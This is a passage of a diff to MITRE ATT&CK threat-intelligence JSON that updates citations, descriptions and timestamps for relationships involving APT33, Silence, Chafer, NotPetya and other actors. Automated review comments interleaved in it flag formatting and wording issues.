+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) attempts to overwrite operating system files and disk structures with image files.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016) In a later variant, randomly generated data was used for data overwrites.(Citation: Unit 42 Shamoon3 2018)(Citation: McAfee Shamoon December 2018)",
"relationship_type": "uses",
"id": "relationship--4b4ac061-dee5-44f3-b0f5-021889eae45e",
"type": "relationship",
- "modified": "2019-04-24T23:59:16.367Z",
+ "modified": "2020-05-29T18:11:24.435Z",
"created": "2019-03-15T13:45:43.244Z"
},
{
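Review bot: The only content change in this hunk is the added McAfee citation, yet all four pre-existing external_references entries (Symantec, FireEye, Palo Alto, Unit 42) are rewritten solely to rotate the order of their `source_name`/`url`/`description` keys. Key order carries no meaning for a JSON consumer, so this is churn that hides the real change and will recur on every regeneration; serialize with a fixed or sorted key order so the diff carries only content. Separately, the new McAfee description has a stray space before the period: `Middle East, Europe . Retrieved May 29, 2020.` should be `Middle East, Europe. Retrieved May 29, 2020.`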
@@ -124069,16 +125294,21 @@
"target_ref": "tool--b76b2d94-60e4-4107-a903-4a3a7622fb3b",
"external_references": [
{
- "source_name": "Symantec MuddyWater Dec 2018",
+ "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.",
"url": "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group",
- "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018."
+ "source_name": "Symantec MuddyWater Dec 2018"
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
}
],
- "description": "(Citation: Symantec MuddyWater Dec 2018)",
+ "description": "(Citation: Symantec MuddyWater Dec 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)",
"relationship_type": "uses",
"id": "relationship--97068a5a-faff-4212-a841-c06db163452e",
"type": "relationship",
- "modified": "2019-06-28T15:30:59.098Z",
+ "modified": "2020-05-18T19:46:02.261Z",
"created": "2019-03-25T14:30:39.398Z"
},
{
@@ -124770,7 +126000,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "malware--75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661",
- "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118",
+ "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada",
"external_references": [
{
"description": "Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.",
@@ -124782,7 +126012,7 @@
"relationship_type": "uses",
"id": "relationship--d9bfa498-69a1-44f9-8e44-67a6a4c48088",
"type": "relationship",
- "modified": "2020-03-23T16:57:49.270Z",
+ "modified": "2020-04-29T22:25:05.277Z",
"created": "2019-03-26T13:38:24.635Z"
},
{
@@ -124983,37 +126213,6 @@
"modified": "2019-04-24T20:02:45.183Z",
"created": "2019-03-26T16:19:52.441Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb",
- "target_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00",
- "external_references": [
- {
- "source_name": "Talos Nyetya June 2017",
- "url": "https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html",
- "description": "Chiu, A. (2016, June 27). New Ransomware Variant \"Nyetya\" Compromises Systems Worldwide. Retrieved March 26, 2019."
- },
- {
- "description": "US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.",
- "url": "https://www.us-cert.gov/ncas/alerts/TA17-181A",
- "source_name": "US-CERT NotPetya 2017"
- },
- {
- "source_name": "Talos Nyetya MEDoc 2017",
- "url": "https://blog.talosintelligence.com/2017/07/the-medoc-connection.html",
- "description": "Maynor, D., Nikolic, A., Olney, M., and Younan, Y. (2017, July 5). The MeDoc Connection. Retrieved March 26, 2019."
- }
- ],
- "description": "[NotPetya](https://attack.mitre.org/software/S0368)'s initial infection vector for the June 27, 2017 compromise was a backdoor in the Ukrainian tax accounting software M.E.Doc.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: Talos Nyetya MEDoc 2017)",
- "relationship_type": "uses",
- "id": "relationship--e5790d71-64cb-4db3-aeba-702bca1ba5f0",
- "type": "relationship",
- "modified": "2020-03-16T21:27:41.168Z",
- "created": "2019-03-26T16:19:52.444Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -125512,7 +126711,7 @@
"relationship_type": "uses",
"id": "relationship--cc4f0b64-db39-4546-a5fc-a518ecc5438b",
"type": "relationship",
- "modified": "2019-06-28T15:25:29.853Z",
+ "modified": "2020-07-15T13:03:46.660Z",
"created": "2019-03-26T19:23:02.065Z"
},
{
@@ -125542,7 +126741,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "malware--32066e94-3112-48ca-b9eb-ba2b59d2f023",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"external_references": [
{
"source_name": "Symantec Emotet Jul 2018",
@@ -125574,7 +126773,7 @@
"relationship_type": "uses",
"id": "relationship--88309efb-b366-4c4a-bd23-ba43b9f05c4c",
"type": "relationship",
- "modified": "2020-03-19T19:31:20.314Z",
+ "modified": "2020-06-23T19:51:01.709Z",
"created": "2019-03-26T19:23:02.073Z"
},
{
@@ -125989,16 +127188,21 @@
"target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
"external_references": [
{
- "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.",
+ "source_name": "Symantec Elfin Mar 2019",
"url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "source_name": "Symantec Elfin Mar 2019"
+ "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019."
+ },
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
}
],
- "description": "[APT33](https://attack.mitre.org/groups/G0064) has attempted to exploit a known vulnerability in WinRAR (CVE-2018-20250). (Citation: Symantec Elfin Mar 2019)",
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has attempted to exploit a known vulnerability in WinRAR (CVE-2018-20250), and attempted to gain remote code execution via a security bypass vulnerability (CVE-2017-11774).(Citation: Symantec Elfin Mar 2019)(Citation: Microsoft Holmium June 2020)",
"relationship_type": "uses",
"id": "relationship--e948752d-c4a1-4678-97e4-2bd11563115e",
"type": "relationship",
- "modified": "2019-06-28T15:05:33.153Z",
+ "modified": "2020-06-22T20:15:32.360Z",
"created": "2019-04-10T15:21:29.417Z"
},
{
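Review bot: The added clause identifies CVE-2017-11774 only as "a security bypass vulnerability" while the WinRAR clause names its product, so a reader cannot tell which application's patch status to check; name the affected software the same way (presumably the one the cited Microsoft post describes — confirm against the source). The sentence also fuses two different activities, exploiting a known bug and using a bypass to reach remote code execution, into one clause; splitting them reads more clearly: `has attempted to exploit a known vulnerability in WinRAR (CVE-2018-20250), and has attempted to gain remote code execution via a security bypass vulnerability in <product> (CVE-2017-11774).`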
@@ -126043,27 +127247,6 @@
"modified": "2019-06-28T15:05:33.935Z",
"created": "2019-04-10T15:21:29.533Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f",
- "target_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
- "external_references": [
- {
- "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.",
- "url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "source_name": "Symantec Elfin Mar 2019"
- }
- ],
- "description": "(Citation: Symantec Elfin Mar 2019)",
- "relationship_type": "uses",
- "id": "relationship--4aa63758-5271-471e-8276-909c72f0f70e",
- "type": "relationship",
- "modified": "2019-06-28T15:05:33.938Z",
- "created": "2019-04-10T15:21:29.535Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -126183,16 +127366,21 @@
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"external_references": [
{
- "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.",
+ "source_name": "Symantec Elfin Mar 2019",
"url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "source_name": "Symantec Elfin Mar 2019"
+ "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019."
+ },
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
}
],
- "description": "[APT33](https://attack.mitre.org/groups/G0064) has downloaded additional files and programs from its C2 server.(Citation: Symantec Elfin Mar 2019)\t\n",
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has downloaded additional files and programs from its C2 server.(Citation: Symantec Elfin Mar 2019)(Citation: Microsoft Holmium June 2020)\t\n",
"relationship_type": "uses",
"id": "relationship--a06ada98-605a-47c5-9362-41e86c2ada6e",
"type": "relationship",
- "modified": "2019-06-28T15:05:33.412Z",
+ "modified": "2020-06-22T20:15:32.333Z",
"created": "2019-04-10T16:09:07.893Z"
},
{
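Review bot: The rewritten description value still ends with a literal tab and newline inside the string (`(Citation: Microsoft Holmium June 2020)\t\n`), carried over from the old line; other descriptions in this diff end at the closing citation with no trailing whitespace, and consumers render this string as-is, so trim it to `...(Citation: Microsoft Holmium June 2020)`. Since the line is being regenerated anyway, this is the place to drop it rather than propagate it.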
@@ -126204,16 +127392,21 @@
"target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
"external_references": [
{
- "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.",
+ "source_name": "Symantec Elfin Mar 2019",
"url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "source_name": "Symantec Elfin Mar 2019"
+ "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019."
+ },
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
}
],
- "description": "[APT33](https://attack.mitre.org/groups/G0064) has utilized PowerShell to download files from the C2 server and run various scripts. (Citation: Symantec Elfin Mar 2019)",
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has utilized PowerShell to download files from the C2 server and run various scripts. (Citation: Symantec Elfin Mar 2019)(Citation: Microsoft Holmium June 2020)",
"relationship_type": "uses",
"id": "relationship--cd69ba48-b716-4278-b1a0-2efd3bd2d4de",
"type": "relationship",
- "modified": "2019-06-28T15:05:33.402Z",
+ "modified": "2020-06-22T20:15:32.389Z",
"created": "2019-04-10T16:09:07.895Z"
},
{
@@ -126343,16 +127536,21 @@
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"external_references": [
{
- "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.",
+ "source_name": "Symantec Elfin Mar 2019",
"url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "source_name": "Symantec Elfin Mar 2019"
+ "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019."
+ },
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
}
],
- "description": "[APT33](https://attack.mitre.org/groups/G0064) has deployed a tool known as DarkComet to the Startup folder of a victim.(Citation: Symantec Elfin Mar 2019)",
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has deployed a tool known as [DarkComet](https://attack.mitre.org/software/S0334) to the Startup folder of a victim, and used Registry run keys to gain persistence.(Citation: Symantec Elfin Mar 2019)(Citation: Microsoft Holmium June 2020)",
"relationship_type": "uses",
"id": "relationship--d15c3d84-9e21-41ac-9728-f97183b63ec6",
"type": "relationship",
- "modified": "2019-06-28T15:05:33.560Z",
+ "modified": "2020-06-30T22:07:31.581Z",
"created": "2019-04-12T15:39:21.975Z"
},
{
@@ -127476,27 +128674,6 @@
"modified": "2019-06-28T15:05:33.554Z",
"created": "2019-04-17T13:23:24.206Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
- "external_references": [
- {
- "source_name": "FireEye APT33 Guardrail",
- "url": "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
- "description": "Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019."
- }
- ],
- "description": "[APT33](https://attack.mitre.org/groups/G0064) has used port 443 for command and control.(Citation: FireEye APT33 Guardrail)",
- "relationship_type": "uses",
- "id": "relationship--a7465f73-03b9-4cbb-91fc-4f7afb99553a",
- "type": "relationship",
- "modified": "2019-06-28T15:05:33.404Z",
- "created": "2019-04-17T13:23:24.216Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -127530,13 +128707,18 @@
"source_name": "FireEye APT33 Guardrail",
"url": "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
"description": "Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019."
+ },
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
}
],
- "description": "(Citation: FireEye APT33 Guardrail)",
+ "description": "(Citation: FireEye APT33 Guardrail)(Citation: Microsoft Holmium June 2020)",
"relationship_type": "uses",
"id": "relationship--6ea02c5b-f60b-4774-a237-fcc3f498a4f5",
"type": "relationship",
- "modified": "2019-06-28T15:05:34.037Z",
+ "modified": "2020-06-22T20:15:37.597Z",
"created": "2019-04-17T13:30:22.934Z"
},
{
@@ -127713,7 +128895,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "malware--edb24a93-1f7a-4bbf-a738-1397a14662c6",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
"external_references": [
{
"description": "Doaty, J., Garrett, P.. (2018, September 10). We\u2019re Seeing a Resurgence of the Demonic Astaroth WMIC Trojan. Retrieved April 17, 2019.",
@@ -127725,7 +128907,7 @@
"relationship_type": "uses",
"id": "relationship--71ec5140-320c-452c-8512-6a787af027c8",
"type": "relationship",
- "modified": "2020-03-17T19:02:05.654Z",
+ "modified": "2020-06-23T19:38:55.293Z",
"created": "2019-04-17T13:46:38.805Z"
},
{
@@ -129067,36 +130249,20 @@
"source_name": "FireEye APT33 Guardrail",
"url": "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
"description": "Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019."
+ },
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
}
],
- "description": "[APT33](https://attack.mitre.org/groups/G0064) has used password spraying to gain access to target systems.(Citation: FireEye APT33 Guardrail)",
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has used password spraying to gain access to target systems.(Citation: FireEye APT33 Guardrail)(Citation: Microsoft Holmium June 2020)",
"relationship_type": "uses",
"id": "relationship--8b5691c7-1815-4d76-a7dd-dfd827043bb9",
"type": "relationship",
- "modified": "2020-03-11T17:08:34.088Z",
+ "modified": "2020-06-22T20:15:32.352Z",
"created": "2019-04-18T14:44:18.146Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f",
- "target_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852",
- "external_references": [
- {
- "source_name": "FireEye APT33 Guardrail",
- "url": "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
- "description": "Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019."
- }
- ],
- "description": "[APT33](https://attack.mitre.org/groups/G0064) has used kill dates in their malware to guardrail execution.(Citation: FireEye APT33 Guardrail)",
- "relationship_type": "uses",
- "id": "relationship--60df992b-7728-4736-b7bb-98d4578460f8",
- "type": "relationship",
- "modified": "2019-06-28T15:05:33.690Z",
- "created": "2019-04-18T14:44:18.163Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -129970,7 +131136,7 @@
"relationship_type": "mitigates",
"id": "relationship--baa9ac7d-b1fd-4e31-b08a-58c84b39153e",
"type": "relationship",
- "modified": "2019-07-24T19:41:59.067Z",
+ "modified": "2020-07-14T19:33:52.635Z",
"created": "2019-04-22T13:54:51.514Z"
},
{
@@ -131136,13 +132302,18 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
}
],
- "description": "[APT39](https://attack.mitre.org/groups/G0087) has repacked a modified version of [Mimikatz](https://attack.mitre.org/software/S0002) to thwart anti-virus detection.(Citation: FireEye APT39 Jan 2019)",
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has packed tools with UPX, and has repacked a modified version of [Mimikatz](https://attack.mitre.org/software/S0002) to thwart anti-virus detection.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)",
"relationship_type": "uses",
"id": "relationship--4bc2e50e-0753-497f-9ec0-af270abe2af1",
"type": "relationship",
- "modified": "2019-04-29T18:16:38.712Z",
+ "modified": "2020-05-29T14:02:52.610Z",
"created": "2019-04-23T18:08:46.205Z"
},
{
@@ -131401,13 +132572,18 @@
"url": "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
"description": "Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.",
"source_name": "Talos Group123"
+ },
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
}
],
- "description": "[ROKRAT](https://attack.mitre.org/software/S0240) checks for sandboxing libraries.(Citation: Talos Group123)",
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) checks for sandboxing libraries.(Citation: Talos Group123)(Citation: NCCGroup RokRat Nov 2018)",
"relationship_type": "uses",
"id": "relationship--8bbe5f67-f65e-4982-8897-7f7466fc0845",
"type": "relationship",
- "modified": "2020-03-16T18:28:51.721Z",
+ "modified": "2020-05-21T17:07:02.805Z",
"created": "2019-04-24T13:44:02.099Z"
},
{
@@ -131501,7 +132677,7 @@
"relationship_type": "mitigates",
"id": "relationship--50818065-cda9-4fe5-ae74-983bb3e436ba",
"type": "relationship",
- "modified": "2019-10-08T19:54:56.050Z",
+ "modified": "2020-07-14T19:29:17.714Z",
"created": "2019-04-24T16:59:33.716Z"
},
{
@@ -131514,7 +132690,7 @@
"relationship_type": "mitigates",
"id": "relationship--6b392dbc-1f55-4eeb-90b5-3f980a01f11d",
"type": "relationship",
- "modified": "2019-07-25T11:42:52.305Z",
+ "modified": "2020-07-14T19:34:47.765Z",
"created": "2019-04-24T17:01:10.541Z"
},
{
@@ -132101,7 +133277,7 @@
"relationship_type": "mitigates",
"id": "relationship--dfd5d379-9af4-4234-a0b2-a1591197249c",
"type": "relationship",
- "modified": "2019-07-24T19:31:37.125Z",
+ "modified": "2020-07-14T19:31:46.707Z",
"created": "2019-04-26T19:30:33.727Z"
},
{
@@ -132163,13 +133339,18 @@
"description": "Legezo, D. (2019, January 30). Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities. Retrieved April 17, 2019.",
"url": "https://securelist.com/chafer-used-remexi-malware/89538/",
"source_name": "Securelist Remexi Jan 2019"
+ },
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
}
],
- "description": "(Citation: Symantec Chafer Dec 2015)(Citation: Securelist Remexi Jan 2019)",
+ "description": "(Citation: Symantec Chafer Dec 2015)(Citation: Securelist Remexi Jan 2019)(Citation: Symantec Chafer February 2018)",
"relationship_type": "uses",
"id": "relationship--2a37ddb3-56ef-4c2d-bec7-d6060eb0215a",
"type": "relationship",
- "modified": "2019-04-29T18:16:38.854Z",
+ "modified": "2020-05-22T19:37:14.601Z",
"created": "2019-04-29T15:54:23.241Z"
},
{
@@ -133291,13 +134472,18 @@
"description": "GReAT. (2017, November 1). Silence \u2013 a new Trojan attacking financial organizations. Retrieved May 24, 2019.",
"url": "https://securelist.com/the-silence/83009/",
"source_name": "SecureList Silence Nov 2017"
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) has been observed making videos of victims to observe bank employees day to day activities.(Citation: SecureList Silence Nov 2017)",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has been observed making videos of victims to observe bank employees day to day activities.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)",
"relationship_type": "uses",
"id": "relationship--5e60c70a-7b2f-45b8-b7d4-80e214acfb2d",
"type": "relationship",
- "modified": "2019-07-16T16:12:09.181Z",
+ "modified": "2020-05-06T03:12:02.273Z",
"created": "2019-05-24T17:57:36.608Z"
},
{
@@ -133312,13 +134498,18 @@
"description": "GReAT. (2017, November 1). Silence \u2013 a new Trojan attacking financial organizations. Retrieved May 24, 2019.",
"url": "https://securelist.com/the-silence/83009/",
"source_name": "SecureList Silence Nov 2017"
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) can capture victim screen activity.(Citation: SecureList Silence Nov 2017)\t",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) can capture victim screen activity.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)",
"relationship_type": "uses",
"id": "relationship--778765e1-7eb6-46b1-a370-6dfe09081ee3",
"type": "relationship",
- "modified": "2019-07-16T16:12:09.232Z",
+ "modified": "2020-05-06T03:12:02.277Z",
"created": "2019-05-24T17:57:36.629Z"
},
{
@@ -133333,13 +134524,18 @@
"description": "Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019.",
"url": "https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/",
"source_name": "Cyber Forensicator Silence Jan 2019"
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) deleted scheduled task files after its execution.(Citation: Cyber Forensicator Silence Jan 2019)\t",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has deleted artifacts, including scheduled tasks, communicates files from the C2 and other logs.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: Group IB Silence Sept 2018)\t",
"relationship_type": "uses",
"id": "relationship--ccd99593-7ff0-4706-aa94-73cc8d237fe8",
"type": "relationship",
- "modified": "2019-07-16T16:12:09.229Z",
+ "modified": "2020-05-06T03:19:33.693Z",
"created": "2019-05-24T17:57:36.633Z"
},
{
@@ -133375,13 +134571,18 @@
"description": "GReAT. (2017, November 1). Silence \u2013 a new Trojan attacking financial organizations. Retrieved May 24, 2019.",
"url": "https://securelist.com/the-silence/83009/",
"source_name": "SecureList Silence Nov 2017"
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) leverages the Windows API to perform a variety of tasks.(Citation: SecureList Silence Nov 2017)\t",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has leveraged the Windows API, including using CreateProcess() or ShellExecute(), to perform a variety of tasks.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)",
"relationship_type": "uses",
"id": "relationship--fdedfad5-5cb7-436a-8522-6df3f6de42b1",
"type": "relationship",
- "modified": "2019-07-16T16:12:09.269Z",
+ "modified": "2020-05-13T19:33:26.609Z",
"created": "2019-05-24T17:57:36.683Z"
},
{
@@ -133401,13 +134602,23 @@
"description": "GReAT. (2017, November 1). Silence \u2013 a new Trojan attacking financial organizations. Retrieved May 24, 2019.",
"url": "https://securelist.com/the-silence/83009/",
"source_name": "SecureList Silence Nov 2017"
+ },
+ {
+ "source_name": "Group IB Silence Aug 2019",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf",
